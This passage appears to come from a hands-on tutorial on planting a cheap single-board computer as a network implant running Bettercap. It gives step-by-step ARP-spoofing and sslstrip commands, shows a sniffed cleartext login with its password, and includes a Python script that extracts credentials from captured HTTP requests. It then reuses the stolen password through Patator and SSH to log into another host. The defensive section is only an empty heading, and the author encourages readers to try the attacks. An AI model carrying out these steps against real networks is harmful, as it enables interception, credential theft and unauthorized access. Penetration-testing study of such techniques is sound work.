  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
  clear                : Clear the screen.
  include CAPLET       : Load and run this caplet in the current session.
  ! COMMAND            : Execute a shell command and print its output.
  alias MAC NAME       : Assign an alias to a given endpoint given its MAC address.

Modules

  any.proxy     > not running
  api.rest      > not running
  arp.spoof     > not running
  ble.recon     > not running
  caplets       > not running
  dhcp6.spoof   > not running
  dns.spoof     > not running
  events.stream > running
  gps           > not running
  hid           > not running
  http.proxy    > not running
  http.server   > not running
  https.proxy   > not running
  https.server  > not running
  mac.changer   > not running
  mysql.server  > not running
  net.probe     > not running
  net.recon     > not running
  net.sniff     > not running
  packet.proxy  > not running
  syn.scan      > not running
  tcp.proxy     > not running
  ticker        > not running
  ui            > not running
  update        > not running
  wifi          > not running
  wol           > not running

192.168.8.0/24 > 192.168.8.138  »

Then fetch the latest caplets from the Bettercap repository with the caplets.update command. Caplets are scripts that automate sequences of Bettercap commands and settings.

  10.#.#.#/24 > 10.#.#.##  »  caplets.update

[21:18:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
[21:19:03] [sys.log] [inf] caplets installing caplets to /usr/local/share/bettercap/caplets ...

Use caplets.show to list the installed caplets and where they live on the filesystem. It is worth reading the caplet files themselves; each carries a short description of what it does.

  10.#.#.#/24 > 10.#.#.##  »  caplets.show

┌─────────────────────────────────────┬────────────────────────────────────────────────────────────────────────────┬────────┐
│ Name                                │ Path                                                                       │ Size   │
├─────────────────────────────────────┼────────────────────────────────────────────────────────────────────────────┼────────┤
│ ap                                  │ /usr/local/share/bettercap/caplets/ap.cap                                  │ 307 B  │
│ crypto-miner/crypto-miner           │ /usr/local/share/bettercap/caplets/crypto-miner/crypto-miner.cap           │ 666 B  │
│ download-autopwn/download-autopwn   │ /usr/local/share/bettercap/caplets/download-autopwn/download-autopwn.cap   │ 2.6 kB │
│ fb-phish/fb-phish                   │ /usr/local/share/bettercap/caplets/fb-phish/fb-phish.cap                   │ 140 B  │
│ gitspoof/gitspoof                   │ /usr/local/share/bettercap/caplets/gitspoof/gitspoof.cap                   │ 216 B  │
│ gps                                 │ /usr/local/share/bettercap/caplets/gps.cap                                 │ 109 B  │
│ hstshijack/hstshijack               │ /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap               │ 799 B  │
│ http-req-dump/http-req-dump         │ /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.cap         │ 591 B  │
│ http-ui                             │ /usr/local/share/bettercap/caplets/http-ui.cap                             │ 382 B  │
│ https-ui                            │ /usr/local/share/bettercap/caplets/https-ui.cap                            │ 661 B  │
│ jsinject/jsinject                   │ /usr/local/share/bettercap/caplets/jsinject/jsinject.cap                   │ 210 B  │
│ local-sniffer                       │ /usr/local/share/bettercap/caplets/local-sniffer.cap                       │ 244 B  │
│ login-manager-abuse/login-man-abuse │ /usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B  │
│ mana                                │ /usr/local/share/bettercap/caplets/mana.cap                                │ 61 B   │
│ massdeauth                          │ /usr/local/share/bettercap/caplets/massdeauth.cap                          │ 302 B  │
│ mitm6                               │ /usr/local/share/bettercap/caplets/mitm6.cap                               │ 551 B  │
│ netmon                              │ /usr/local/share/bettercap/caplets/netmon.cap                              │ 42 B   │
│ pita                                │ /usr/local/share/bettercap/caplets/pita.cap                                │ 900 B  │
│ proxy-script-test/proxy-script-test │ /usr/local/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B   │
│ rogue-mysql-server                  │ /usr/local/share/bettercap/caplets/rogue-mysql-server.cap                  │ 501 B  │
│ rtfm/rtfm                           │ /usr/local/share/bettercap/caplets/rtfm/rtfm.cap                           │ 210 B  │
│ simple-passwords-sniffer            │ /usr/local/share/bettercap/caplets/simple-passwords-sniffer.cap            │ 131 B  │
│ tcp-req-dump/tcp-req-dump           │ /usr/local/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap           │ 413 B  │
│ web-override/web-override           │ /usr/local/share/bettercap/caplets/web-override/web-override.cap           │ 254 B  │
└─────────────────────────────────────┴────────────────────────────────────────────────────────────────────────────┴────────┘

To quickly enumerate active hosts on the network, invoke the netmon caplet with the include command.

10.#.#.#/24 > 10.#.#.##  »  include netmon

┌───────────────┬───────────────────┬─────────────┬────────────────────────────┬───────┬────────┬──────────┐
│     IP ▴      │        MAC        │    Name     │           Vendor           │ Sent  │ Recvd  │   Seen   │
├───────────────┼───────────────────┼─────────────┼────────────────────────────┼───────┼────────┼──────────┤
│ 192.168.8.138 │ XX:XX:XX:XX:XX:XX │ eth0        │                            │ 0 B   │ 0 B    │ 21:18:37 │
│ 192.168.8.1   │ XX:XX:XX:XX:XX:XX │ gateway     │ Mediabridge Products, LLC. │ 19 kB │ 8.6 kB │ 21:18:37 │
│               │                   │             │                            │       │        │          │
│ 192.168.8.179 │ XX:XX:XX:XX:XX:XX │             │ Sony Corporation           │ 32 kB │ 128 kB │ 21:20:24 │
│ 192.168.8.193 │ XX:XX:XX:XX:XX:XX │ Windows 10  │                            │ 916 B │ 1.3 kB │ 21:20:20 │
└───────────────┴───────────────────┴─────────────┴────────────────────────────┴───────┴────────┴──────────┘

↑ 54 kB / ↓ 433 kB / 4310 pkts

Alternatively, traffic passing between devices on the network can be sniffed by running the following six commands in order.

10.#.#.#/24 > 10.#.#.##  »  set http.proxy.sslstrip true
10.#.#.#/24 > 10.#.#.##  »  set arp.spoof.internal true
10.#.#.#/24 > 10.#.#.##  »  set net.sniff.verbose false
10.#.#.#/24 > 10.#.#.##  »  net.sniff on
10.#.#.#/24 > 10.#.#.##  »  http.proxy on
10.#.#.#/24 > 10.#.#.##  »  arp.spoof on

Bettercap will begin to display a ton of data passing over the network. In some cases, there will be servers and services on the network that don't support HTTPS, or don't use it by default, such as the media server on 192.168.8.183:8096 below. These are the prime targets for a tool like Bettercap: http.proxy.sslstrip can only downgrade connections a browser is willing to make over plain HTTP (sites with HSTS, and especially preloaded ones, will not downgrade), but a service that never speaks TLS in the first place hands over everything.

Below is an example of a POST request made by a user authenticating to a media server running on one of the network devices.

POST /media_server/Users/authenticatebyname HTTP/1.1
Host: 192.168.8.183:8096
Accept-Encoding: gzip, deflate
X-media-Authorization: MediaBrowser Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"
Content-Length: 46
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Referer: http://192.168.8.183:8096/web/index.html
Content-Type: application/json
Origin: http://192.168.8.183:8096
Accept: application/json
Accept-Language: en-US,en;q=0.5

{
  "Username": "tokyoneon",
  "Pw": "secure_password-321"
}

Bettercap displays the username and password found in the login request. These credentials can be used to pivot to other services on the network, for example the SSH server previously discovered on the same host, 192.168.8.183. Now that the attacker has some sense of the target's preferred username and password scheme, they can test the credentials against other services on the network.
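As an added example (not Bettercap's code and not from this article), the Python below does the same extraction a passive sniffer performs on the login request above: it parses the raw HTTP request, pulls username/password-looking fields out of a JSON or form-encoded body, and base64-decodes the DeviceId from the media server's X-media-Authorization header. The request bytes are rebuilt from the capture above with a compact JSON body and a Content-Length that matches it; the lists of field names treated as credentials are my own heuristic.

```python
"""Extract credentials from a sniffed cleartext HTTP login request.

Added example, not Bettercap code. SAMPLE_REQUEST is rebuilt from the
capture in the article with a compact JSON body and a matching
Content-Length; USER_KEYS/PASS_KEYS are a heuristic, not a standard.
"""
import base64
import binascii
import json
import re
from urllib.parse import parse_qsl

USER_KEYS = {"username", "user", "login", "email", "uid"}
PASS_KEYS = {"pw", "password", "passwd", "pass", "pwd"}

BODY = b'{"Username":"tokyoneon","Pw":"secure_password-321"}'
SAMPLE_REQUEST = (
    b"POST /media_server/Users/authenticatebyname HTTP/1.1\r\n"
    b"Host: 192.168.8.183:8096\r\n"
    b'X-media-Authorization: MediaBrowser Device="Firefox", '
    b'DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkg'
    b'R2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"\r\n'
    b"Content-Type: application/json\r\n"
    b"Origin: http://192.168.8.183:8096\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    b"\r\n" + BODY
)


def parse_http_request(raw):
    """Split one raw request into method, path, lower-cased headers and body."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(rest)))
    return {"method": method, "path": path, "headers": headers, "body": rest[:length]}


def extract_credentials(req):
    """(field, value) pairs whose field name looks like a username or password."""
    ctype = req["headers"].get("content-type", "")
    body = req["body"].decode("utf-8", errors="replace")
    if "json" in ctype:
        try:
            data = json.loads(body)
        except json.JSONDecodeError:
            return []
        fields = list(data.items()) if isinstance(data, dict) else []
    else:
        fields = parse_qsl(body, keep_blank_values=True)  # application/x-www-form-urlencoded
    return [(k, str(v)) for k, v in fields if k.lower() in USER_KEYS | PASS_KEYS]


def decode_device_id(auth_header):
    """MediaBrowser's DeviceId is base64 text; return it decoded, or None."""
    match = re.search(r'DeviceId="([^"]+)"', auth_header)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def summarize(raw):
    """Everything an attacker gets from one sniffed login: target, creds, client identity."""
    req = parse_http_request(raw)
    return {
        "target": req["headers"].get("host", "?") + req["path"],
        "credentials": extract_credentials(req),
        "device_id": decode_device_id(req["headers"].get("x-media-authorization", "")),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_REQUEST).items():
        print(f"{key:12} {value}")
```

The DeviceId decodes to the browser's User-Agent string followed by a '|' and a numeric value, which is the kind of detail that ties a sniffed request to one specific client on the network. The same parser handles application/x-www-form-urlencoded logins, where the pair arrives as user=...&password=... instead of JSON.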

  root@orangepizero:~# cd /opt/patator/
  root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=tokyoneon password='secure_password-321' -t 1

INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 0     39     0.117 |                                    |     1 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 0 r/s, Time: 0h 0m 1s

This time Patator did not return an "Authentication failed" message: the code column shows 0 and the mesg column holds the server's SSH banner, which is what a successful login looks like here. The same username and password can now be used to log into the SSH server directly, a straightforward password-reuse attack.

  root@orangepizero:/opt/patator# cd
  root@orangepizero:~# ssh -p 22 tokyoneon@192.168.8.183

The authenticity of host '192.168.8.183 (192.168.8.183)' can't be established.
ECDSA key fingerprint is SHA256:3QmOhr8syz8l4HBWICG53DdVE2fStfHdO2Ri/nU4hBc.
Are you sure you want to continue connecting (yes/no)? yes

Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-29-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Mon Apr 15 07:27:14 2019 from 127.0.0.1

tokyoneon@ubuntu:~$

How to Protect Yourself Against Network Implant Attacks

Setting up the Orange Pi Zero and performing these attacks on my test networks was a lot of fun. I highly encourage readers to give this kind of attack a try and deploy cheap SBCs during pentesting engagements.

Until next time, you can follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.

Don't Miss: Intercept & Decrypt Windows Passwords on a Local Network

Cover photo by tokyoneon/Null Byte



